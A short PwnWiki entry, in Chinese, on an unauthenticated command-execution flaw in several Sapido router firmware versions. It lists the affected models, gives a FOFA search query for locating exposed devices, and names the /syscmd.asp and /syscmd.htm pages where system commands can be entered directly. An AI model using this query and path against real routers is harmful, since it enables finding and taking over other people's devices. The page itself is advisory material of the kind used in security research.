Sapido多款路由器命令執行漏洞

From PwnWiki

Other languages:

Chinese • ‎中文（中国大陆）‎

漏洞影響

BR270n-v2.1.03

BRC76n-v2.1.03

GR297-v2.1.3

RB1732-v2.0.43

FOFA

app="Sapido-路由器"

漏洞利用

訪問目標，直接輸入系統命令即可執行。

http://xxx.xxx.xxx.xxx/syscmd.asp
http://xxx.xxx.xxx.xxx/syscmd.htm

參考

http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Sapido/Sapido%E5%A4%9A%E6%AC%BE%E8%B7%AF%E7%94%B1%E5%99%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

Retrieved from "https://pwnwiki.com/index.php?title=Sapido多款路由器命令執行漏洞&oldid=431"